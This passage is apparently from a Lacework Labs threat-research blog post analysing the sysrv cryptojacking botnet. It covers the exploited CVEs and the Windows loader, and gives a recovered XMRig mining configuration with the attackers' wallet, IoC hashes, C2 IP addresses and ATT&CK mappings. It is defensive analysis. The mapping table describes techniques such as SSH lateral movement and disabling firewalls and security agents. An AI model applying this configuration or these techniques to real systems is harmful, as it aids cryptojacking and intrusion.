<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2019-11581</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Critical Template Injection Vulnerability in Atlassian Jira<br />
<span style="font-weight: 400; padding-left: 5px;">Server</span></span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2019-7238</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">RCE in Sonatype NXRM 3</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2017-5638</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Vulnerability in the Apache Struts MVC framework</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2020-14882</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Oracle WebLogic Server Remote Code Execution</span></td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p>A deeper look into these particular CVEs can be found on on a recent Juniper blog post available <a href="https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence" target="_blank" rel="noopener">here</a>. The entirety of the execution flow can be shown in the diagram below.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6988" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003.png" alt="" width="1997" height="1999" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003.png 1997w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-300x300.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-1024x1024.png 1024w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-150x150.png 150w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-768x769.png 768w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003-1534x1536.png 1534w" sizes="(max-width: 1997px) 100vw, 1997px" /></center>&nbsp;</p>
<h2>Windows Variant</h2>
<p>An alternative to ldr.sh is ldr.ps1 for Windows machines. The observed ldr.ps1 is significantly less robust than its Linux counterpart. Focusing largely on killing a handful of other processes prior to downloading and executing sys.exe out of a Windows temp directory. The image below captures the functionality of ldr.ps1</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6991" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004.png" alt="" width="915" height="182" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004.png 915w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004-300x60.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004-768x153.png 768w" sizes="(max-width: 915px) 100vw, 915px" /></center>Upon executing sys.exe in the following message being displayed, which translates to “Scanning” in Russian.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6992" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_005.png" alt="" width="282" height="33" /></center>During the execution of sys.exe, the XMRig application along with the mining configuration file is written to a temporary directory created within AppData\Local . Just as with the Linux variant, the Windows variation of the miner is also called “<span class="inlineCodeBlock">[kthreaddi].exe</span>”. The same username that was used in the Linux variant was leveraged within this XMRig configuration file as well. Sys.exe is also written in Golang, and shares similar functionality to the Linux counterpart. As “[kthreaddi].exe&#8221; begins to mine Monero, sys.exe attempts to start infecting other machines.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6993" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_006.png" alt="" width="549" height="50" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_006.png 549w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_006-300x27.png 300w" sizes="(max-width: 549px) 100vw, 549px" /></center>The following pcap shows the initial c2 request performed during behavioral analysis. In this instance, the server returns the command ‘123654’. While the accepted commands for the malware are unclear, this command preceded both the Monero mining and botnet propagation activities.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6994" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007.png" alt="" width="1055" height="453" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007.png 1055w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007-300x129.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007-1024x440.png 1024w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_007-768x330.png 768w" sizes="(max-width: 1055px) 100vw, 1055px" /></center>&nbsp;</p>
<h2>Total Monero Mined</h2>
<p>During analysis the Lacework Labs team recovered the XMRig configuration file. The configuration was set to mine monero from f2pool. Looking up the wallet from f2pool’s website return that at the time of this writing the actors leveraging sysvr have mined slightly over 12.1 worth of monero worth $3,928.46 USD. The image below shows the XMRig configuration being sent over the network to the mining pool.</p>
<pre><pre class="brush: bash; title: ; notranslate" title="">
{"autosave": false, "watch": false, "background": true, "donate-level": 0, "pools":
   [ { "keepalive": true, "url": "xmr.f2pool.com:13531",
       "user":"49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa.l32",
       "pass": "x" }
    ] }
 }
</pre>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><img loading="lazy" class="alignnone size-full wp-image-6995" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008.png" alt="" width="1117" height="543" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008.png 1117w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008-300x146.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008-1024x498.png 1024w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_008-768x373.png 768w" sizes="(max-width: 1117px) 100vw, 1117px" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><img loading="lazy" class="alignnone size-full wp-image-6996" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_009.png" alt="" width="947" height="328" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_009.png 947w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_009-300x104.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_009-768x266.png 768w" sizes="(max-width: 947px) 100vw, 947px" /></p>
<p>&nbsp;</p>
<h2>Conclusion</h2>
<p>The sysrv malware takes advantage of known vulnerabilities to spread their Cryptojacking malware. Ensuring public facing applications (<a href="https://attack.mitre.org/techniques/T1190" target="_blank" rel="noopener">T1190</a>) are kept up to date with the latest security patches is critical to avoid opportunistic adversaries from compromising systems. Due to the lateral movement capabilities of the initial bash (ldr.sh) script, if an infected host is found, it is recommended that other hosts listed in <span class="inlineCodeBlock">authorized_hosts</span>, <span class="inlineCodeBlock">bash_history</span>, and user’s <span class="inlineCodeBlock">~/.ssh/config are inspected for compromise.</span></p>
<p>All IOCs can be found on the Lacework Labs GitHub. Also, please follow <a href="https://twitter.com/laceworklabs" target="_blank" rel="noopener">@LaceworkLabs Twitter</a> to keep up with our latest research.</p>
<h2>IoCs</h2>
<p>&nbsp;</p>
<table style="width: 100%; border-collapse: collapse;">
<tbody>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">ldr.sh</td>
<td style="width: 80%; height: 23px;">c07838598435a26f658654db4ce816914e6cfe70056382471362407d6093e1fa</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">ldr.sh</td>
<td style="width: 80%; height: 23px;">ac0d8aceb01077b5ff3de02c6c63971054104bedabf3732ed169646a3f7e10e9</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">ldr.sh</td>
<td style="width: 80%; height: 23px;">6464434e5040b6bab0dd8b55b906dc1d068a21de5684e75e5eb51aa2608ef0ad</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">ldr.ps1</td>
<td style="width: 80%; height: 23px;">28dcdabaab2837b944a260048792ee4141ab0b3061637d7b9097706292c76877</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">sysrv.exe</td>
<td style="width: 80%; height: 23px;">f115f7826b7857be4522b84a17077a49d0ec0835010da31060acf85bab87778c</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">sysrv.exe (UPX packed)</td>
<td style="width: 80%; height: 23px;">80bc76202b75201c740793ea9cd33b31cc262ef01738b053e335ee5d07a5ba96</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">sysrv</td>
<td style="width: 80%; height: 24px;">d50864f13378b333784f7469df98ef2ea438489ccf0649622897a7712a9c18f8</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">sysrv (UPX packed)</td>
<td style="width: 80%; height: 23px;">544d20fc286d0803dee86a9c34b4c348333e320a4e33fd2730079701cb6e108f</td>
</tr>
</tbody>
</table>
<table style="width: 100%; border-collapse: collapse;">
<tbody>
<tr style="height: 23px;">
<td style="background-color: #000000; width: 100%;" colspan="2"></td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">XMRig Username</td>
<td style="width: 80%; height: 23px; font-size: .9em;">49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa</td>
</tr>
</tbody>
</table>
<table style="width: 100%; border-collapse: collapse;">
<tbody>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">Pool Used</td>
<td style="width: 80%; height: 23px;">xmr.f2pool.com</td>
</tr>
</tbody>
</table>
<table style="width: 100%; border-collapse: collapse;">
<tbody>
<tr style="height: 23px;">
<td style="background-color: #000000; width: 100%;" colspan="2"></td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">194.145.227.21</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">194.40.243.98</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">31.42.177.123</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">31.210.20.181</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">31.210.20.120</td>
</tr>
<tr style="height: 23px;">
<td style="width: 20%; height: 23px;">IPv4</td>
<td style="width: 80%; height: 23px;">185.239.242.71</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
<h2>MITRE ATT&amp;CK Mappings</h2>
<p>&nbsp;</p>
<table style="border-collapse: collapse; width: 100%; height: 384px;">
<thead>
<tr style="background-color: #e8e8e8;">
<th style="width: 10%; text-align: center; border-style: solid; border-color: #ffffff; height: 24px;">TID</th>
<th style="width: 25%; text-align: center; border-style: solid; border-color: #ffffff; height: 24px;">Technique Name</th>
<th style="width: 65%; text-align: center; border-style: solid; border-color: #ffffff; height: 24px;">Observed Functionality</th>
</tr>
</thead>
<tbody>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1496</td>
<td style="width: 25%; height: 24px;">Resource Hijacking</td>
<td style="width: 65%; height: 24px;">Cryptojacking</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1110</td>
<td style="width: 25%; height: 24px;">Brute Force</td>
<td style="width: 65%; height: 24px;">The sysrv propagation component attempts to brute force MySQL and Tomcat instances.</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1190</td>
<td style="width: 25%; height: 24px;">Exploiting Public Applications</td>
<td style="width: 65%; height: 24px;">Leveraging CVEs to exploit public facing applications.</td>
</tr>
<tr style="height: 48px;">
<td style="width: 10%; height: 48px;">T1027.002</td>
<td style="width: 25%; height: 48px;">Obfuscated files or information: Software Packing</td>
<td style="width: 65%; height: 48px;">2nd stage payloads were UPX packed.</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1132.001</td>
<td style="width: 25%; height: 24px;">Data Encoding: Standard Encoding</td>
<td style="width: 65%; height: 24px;">Base64 was leveraged within ldr.sh scripts</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1059.004</td>
<td style="width: 25%; height: 24px;">Command and Scripting Interpreter</td>
<td style="width: 65%; height: 24px;">Bash scripts were leveraged for spreading their Cryptojacking malware as well as the propagator.</td>
</tr>
<tr style="height: 48px;">
<td style="width: 10%; height: 48px;">T1021.004</td>
<td style="width: 25%; height: 48px;">Lateral Movement &#8211; Remote Services: SSH</td>
<td style="width: 65%; height: 48px;">Bash scripts leveraged ssh keys to move to hosts within bash_history, known host files, and ssh configs.</td>
</tr>
<tr style="height: 48px;">
<td style="width: 10%; height: 48px;">T1562.001</td>
<td style="width: 25%; height: 48px;">Impair Defenses: Disable or Modify Tools</td>
<td style="width: 65%; height: 48px;">Aliyun agent (Alibaba Cloud) is removed. IPTables are flushed and default policy is changed to allow.</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1070.004</td>
<td style="width: 25%; height: 24px;">Indicator Removal on Host: File Deletion</td>
<td style="width: 65%; height: 24px;">The sysrv payload deletes the underlying XMRig binary after it is launched in Linux environments.</td>
</tr>
<tr style="height: 48px;">
<td style="width: 10%; height: 48px;">T1140</td>
<td style="width: 25%; height: 48px;">Deobfuscate/Decode Files or Information</td>
<td style="width: 65%; height: 48px;">Both the ELF and Win32 variants of sysrv/sys.exe have embedded files.</td>
</tr>
<tr style="height: 24px;">
<td style="width: 10%; height: 24px;">T1485</td>
<td style="width: 25%; height: 24px;">Data Destruction</td>
<td style="width: 65%; height: 24px;">The ldr.sh bash script has been observed overwriting contents of /etc/ld.so.preload</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>

		</div>
	</section>
</main>

  
    <footer class="global-footer">
	<div class="wrapper">
		<div class="logo">
			<figure class="wp-block-image size-large"><img  src="https://www.lacework.com/wp-content/uploads/2022/01/Lacework_Shield_RGB.svg" alt="" class="wp-image-9347"/></figure>
		</div>
		<div class="global-footer-row">
			<div class="global-footer-links">
				<div class="widget"><h2>Explore</h2><div class="menu-quick-links-container"><ul id="menu-quick-links" class="menu"><li id="menu-item-9476" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9476"><a href="https://www.lacework.com/platform/">Platform</a></li>
<li id="menu-item-9477" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9477"><a href="https://www.lacework.com/solutions/">Solutions</a></li>
<li id="menu-item-9478" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9478"><a href="https://www.lacework.com/platform/polygraph/">Polygraph</a></li>
<li id="menu-item-10048" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10048"><a href="https://www.lacework.com/platform/threat-detection/">Threat Detection</a></li>
<li id="menu-item-10049" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10049"><a href="https://www.lacework.com/platform/vulnerability-management/">Vulnerability Management</a></li>
<li id="menu-item-10050" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10050"><a href="https://www.lacework.com/solutions/container-security/">Container Security</a></li>
<li id="menu-item-10051" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10051"><a href="https://www.lacework.com/platform/multicloud/">Multicloud</a></li>
<li id="menu-item-10052" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10052"><a href="https://www.lacework.com/platform/cloud-security-posture-and-compliance/">Cloud Security Posture and Compliance</a></li>
<li id="menu-item-11932" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11932"><a target="_blank" rel="noopener" href="https://www.polygraph.com">Polygraph Experience</a></li>
</ul></div></div><div class="widget"><h2>Learn</h2><div class="menu-learn-container"><ul id="menu-learn" class="menu"><li id="menu-item-10492" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10492"><a href="https://www.lacework.com/blog/">Blog</a></li>
<li id="menu-item-10493" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10493"><a href="https://www.lacework.com/resources/">Resources</a></li>
<li id="menu-item-10053" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10053"><a href="https://academy.lacework.com/">Lacework Academy</a></li>
<li id="menu-item-10054" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10054"><a href="https://docs.lacework.com/">Documentation</a></li>
</ul></div></div><div class="widget"><h2>Company</h2><div class="menu-company-container"><ul id="menu-company" class="menu"><li id="menu-item-10055" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10055"><a href="https://www.lacework.com/about-us/">About Us</a></li>
<li id="menu-item-10059" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10059"><a href="https://www.lacework.com/investors/">Investors</a></li>
<li id="menu-item-11299" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11299"><a href="https://www.lacework.com/events/">Events</a></li>
<li id="menu-item-10056" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10056"><a href="https://www.lacework.com/press-releases/">Press Releases</a></li>
<li id="menu-item-10060" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10060"><a href="https://www.lacework.com/trust/">Trust</a></li>
<li id="menu-item-10057" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10057"><a href="https://www.lacework.com/careers/">Careers</a></li>
<li id="menu-item-11060" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11060"><a href="https://www.lacework.com/legal/">Legal</a></li>
<li id="menu-item-12074" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12074"><button id="ot-sdk-btn" class="ot-sdk-show-settings">Cookie Settings</button></li>
</ul></div></div><div class="widget"><h2>Support</h2><div class="menu-support-container"><ul id="menu-support" class="menu"><li id="menu-item-10062" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10062"><a href="https://support.lacework.com/hc/en-us">Support</a></li>
<li id="menu-item-10061" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10061"><a href="https://status.lacework.net/">Status</a></li>
<li id="menu-item-10063" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10063"><a href="https://login.lacework.net/ui/">Login</a></li>
</ul></div></div>
			</div>
			<div class="global-footer-column">
				<div class="global-footer-contact-us">
					<h4>Contact Us</h4>
<p>To request a demo or chat with the sales team:</p>
<p><a class="button button--primary" href="/contact">Contact Us</a></p>

				</div>
				<ul class="global-footer-social">
											<li>
							<a href="https://twitter.com/Lacework" target="_blank" title="twitter">
								<span class="icon-twitter"></span>
							</a>
						</li>
																<li>
							<a href="https://www.facebook.com/laceworkinc" target="_blank" title="facebook">
								<span class="icon-facebook"></span>
							</a>
						</li>
																<li>
							<a href="https://www.linkedin.com/company/lacework/" target="_blank" title="linkedin">
								<span class="icon-linkedin"></span>
							</a>
						</li>
																<li>
							<a href="https://www.youtube.com/c/Lacework" target="_blank" title="youtube">
								<span class="icon-youtube"></span>
							</a>
						</li>
									</ul>
			</div>
		</div>
		<div class="global-footer-copyright">
			<p><p><em>©</em>&nbsp;2022, Lacework, &nbsp;All Rights Reserved.</p></p>
			<div class="menu-privacy-links-container"><ul id="menu-privacy-links" class="menu"><li id="menu-item-137" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-137"><a href="/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-11071" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11071"><a href="https://www.lacework.com/terms-of-use/">Terms of Use</a></li>
</ul></div>
		</div>
	</div>
	<!-- Start Cookie Script -->
	<div data-module="Cookies"></div>
	<!-- End Cookie Script -->
</footer>
    <!-- Global script includes -->
    <!-- Google Tag Manager (noscript) -->
<noscript>
  <iframe src=" "height="0" width="0" style="display:none;visibility:hidden"></iframe>
</noscript>
<!-- End Google Tag Manager (noscript) -->

<div class="se-pre-con"></div>

<!-- Engagio Script --> 
<script type="text/javascript" charset="utf-8"> 
  var _eiq = _eiq || []; var _engagio_settings = {  accountId: "eb69cca014db5b67b42a2401139ea11db00f5120" }; (function() {  var ei = document.createElement('script'); ei.type = 'text/javascript'; ei.async = true;  ei.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'web-analytics.engagio.com/js/ei.js';  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ei, s); })();
</script>
<!-- End Engagio Script -->

<!-- Fontawesome -->
<script src="https://kit.fontawesome.com/293e8b564e.js" crossorigin="anonymous"></script>
<!-- End Fontawesome -->    <script src='https://www.lacework.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js?ver=3.0.9b' id='syntaxhighlighter-core-js'></script>
<script src='https://www.lacework.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushBash.js?ver=3.0.9b' id='syntaxhighlighter-brush-bash-js'></script>
<script type='text/javascript'>
	(function(){
		var corecss = document.createElement('link');
		var themecss = document.createElement('link');
		var corecssurl = "https://www.lacework.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css?ver=3.0.9b";
		if ( corecss.setAttribute ) {
				corecss.setAttribute( "rel", "stylesheet" );
				corecss.setAttribute( "type", "text/css" );
				corecss.setAttribute( "href", corecssurl );
		} else {
				corecss.rel = "stylesheet";
				corecss.href = corecssurl;
		}
		document.head.appendChild( corecss );
		var themecssurl = "https://www.lacework.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css?ver=3.0.9b";
		if ( themecss.setAttribute ) {
				themecss.setAttribute( "rel", "stylesheet" );
				themecss.setAttribute( "type", "text/css" );
				themecss.setAttribute( "href", themecssurl );
		} else {
				themecss.rel = "stylesheet";
				themecss.href = themecssurl;
		}
		document.head.appendChild( themecss );
	})();
	SyntaxHighlighter.config.strings.expandSource = '+ expand source';
	SyntaxHighlighter.config.strings.help = '?';
	SyntaxHighlighter.config.strings.alert = 'SyntaxHighlighter\n\n';
	SyntaxHighlighter.config.strings.noBrush = 'Can\'t find brush for: ';
	SyntaxHighlighter.config.strings.brushNotHtmlScript = 'Brush wasn\'t configured for html-script option: ';
	SyntaxHighlighter.defaults['pad-line-numbers'] = false;
	SyntaxHighlighter.defaults['toolbar'] = false;
	SyntaxHighlighter.all();

	// Infinite scroll support
	if ( typeof( jQuery ) !== 'undefined' ) {
		jQuery( function( $ ) {
			$( document.body ).on( 'post-load', function() {
				SyntaxHighlighter.highlight();
			} );
		} );
	}
</script>
<script id='rocket-browser-checker-js-after'>
"use strict";var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||!1,descriptor.configurable=!0,"value"in descriptor&&(descriptor.writable=!0),Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){return protoProps&&defineProperties(Constructor.prototype,protoProps),staticProps&&defineProperties(Constructor,staticProps),Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor))throw new TypeError("Cannot call a class as a function")}var RocketBrowserCompatibilityChecker=function(){function RocketBrowserCompatibilityChecker(options){_classCallCheck(this,RocketBrowserCompatibilityChecker),this.passiveSupported=!1,this._checkPassiveOption(this),this.options=!!this.passiveSupported&&options}return _createClass(RocketBrowserCompatibilityChecker,[{key:"_checkPassiveOption",value:function(self){try{var options={get passive(){return!(self.passiveSupported=!0)}};window.addEventListener("test",null,options),window.removeEventListener("test",null,options)}catch(err){self.passiveSupported=!1}}},{key:"initRequestIdleCallback",value:function(){!1 in window&&(window.requestIdleCallback=function(cb){var start=Date.now();return setTimeout(function(){cb({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-start))}})},1)}),!1 in window&&(window.cancelIdleCallback=function(id){return clearTimeout(id)})}},{key:"isDataSaverModeOn",value:function(){return"connection"in navigator&&!0===navigator.connection.saveData}},{key:"supportsLinkPrefetch",value:function(){var elem=document.createElement("link");return elem.relList&&elem.relList.supports&&elem.relList.supports("prefetch")&&window.IntersectionObserver&&"isIntersecting"in IntersectionObserverEntry.prototype}},{key:"isSlowConnection",value:function(){return"connection"in navigator&&"effectiveType"in navigator.connection&&("2g"===navigator.connection.effectiveType||"slow-2g"===navigator.connection.effectiveType)}}]),RocketBrowserCompatibilityChecker}();
</script>
<script id='rocket-preload-links-js-extra'>
var RocketPreloadLinksConfig = {"excludeUris":"\/(?:.+\/)?feed(?:\/(?:.+\/?)?)?$|\/(?:.+\/)?embed\/|\/(index\\.php\/)?wp\\-json(\/.*|$)|\/refer\/|\/go\/|\/recommend\/|\/recommends\/","usesTrailingSlash":"1","imageExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php","fileExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php|html|htm","siteUrl":"https:\/\/www.lacework.com","onHoverDelay":"100","rateThrottle":"3"};
</script>
<script id='rocket-preload-links-js-after'>
(function() {
"use strict";var r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e=function(){function i(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&i(e.prototype,t),n&&i(e,n),e}}();function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function n(e,t){i(this,n),this.browser=e,this.config=t,this.options=this.browser.options,this.prefetched=new Set,this.eventTime=null,this.threshold=1111,this.numOnHover=0}return e(n,[{key:"init",value:function(){!this.browser.supportsLinkPrefetch()||this.browser.isDataSaverModeOn()||this.browser.isSlowConnection()||(this.regex={excludeUris:RegExp(this.config.excludeUris,"i"),images:RegExp(".("+this.config.imageExt+")$","i"),fileExt:RegExp(".("+this.config.fileExt+")$","i")},this._initListeners(this))}},{key:"_initListeners",value:function(e){-1<this.config.onHoverDelay&&document.addEventListener("mouseover",e.listener.bind(e),e.listenerOptions),document.addEventListener("mousedown",e.listener.bind(e),e.listenerOptions),document.addEventListener("touchstart",e.listener.bind(e),e.listenerOptions)}},{key:"listener",value:function(e){var t=e.target.closest("a"),n=this._prepareUrl(t);if(null!==n)switch(e.type){case"mousedown":case"touchstart":this._addPrefetchLink(n);break;case"mouseover":this._earlyPrefetch(t,n,"mouseout")}}},{key:"_earlyPrefetch",value:function(t,e,n){var i=this,r=setTimeout(function(){if(r=null,0===i.numOnHover)setTimeout(function(){return i.numOnHover=0},1e3);else if(i.numOnHover>i.config.rateThrottle)return;i.numOnHover++,i._addPrefetchLink(e)},this.config.onHoverDelay);t.addEventListener(n,function e(){t.removeEventListener(n,e,{passive:!0}),null!==r&&(clearTimeout(r),r=null)},{passive:!0})}},{key:"_addPrefetchLink",value:function(i){return this.prefetched.add(i.href),new Promise(function(e,t){var n=document.createElement("link");n.rel="prefetch",n.href=i.href,n.onload=e,n.onerror=t,document.head.appendChild(n)}).catch(function(){})}},{key:"_prepareUrl",value:function(e){if(null===e||"object"!==(void 0===e?"undefined":r(e))||!1 in e||-1===["http:","https:"].indexOf(e.protocol))return null;var t=e.href.substring(0,this.config.siteUrl.length),n=this._getPathname(e.href,t),i={original:e.href,protocol:e.protocol,origin:t,pathname:n,href:t+n};return this._isLinkOk(i)?i:null}},{key:"_getPathname",value:function(e,t){var n=t?e.substring(this.config.siteUrl.length):e;return n.startsWith("/")||(n="/"+n),this._shouldAddTrailingSlash(n)?n+"/":n}},{key:"_shouldAddTrailingSlash",value:function(e){return this.config.usesTrailingSlash&&!e.endsWith("/")&&!this.regex.fileExt.test(e)}},{key:"_isLinkOk",value:function(e){return null!==e&&"object"===(void 0===e?"undefined":r(e))&&(!this.prefetched.has(e.href)&&e.origin===this.config.siteUrl&&-1===e.href.indexOf("?")&&-1===e.href.indexOf("#")&&!this.regex.excludeUris.test(e.href)&&!this.regex.images.test(e.href))}}],[{key:"run",value:function(){"undefined"!=typeof RocketPreloadLinksConfig&&new n(new RocketBrowserCompatibilityChecker({capture:!0,passive:!0}),RocketPreloadLinksConfig).init()}}]),n}();t.run();
}());
</script>
<script src='https://www.lacework.com/wp-content/themes/lacework/js/navigation.js?ver=1.0.0' id='lacework-navigation-js'></script>
<script src='https://www.lacework.com/wp-content/themes/lacework/build/scripts/app.built.js?ver=1.1.9' id='script-build-js'></script>
   </body>

</html>
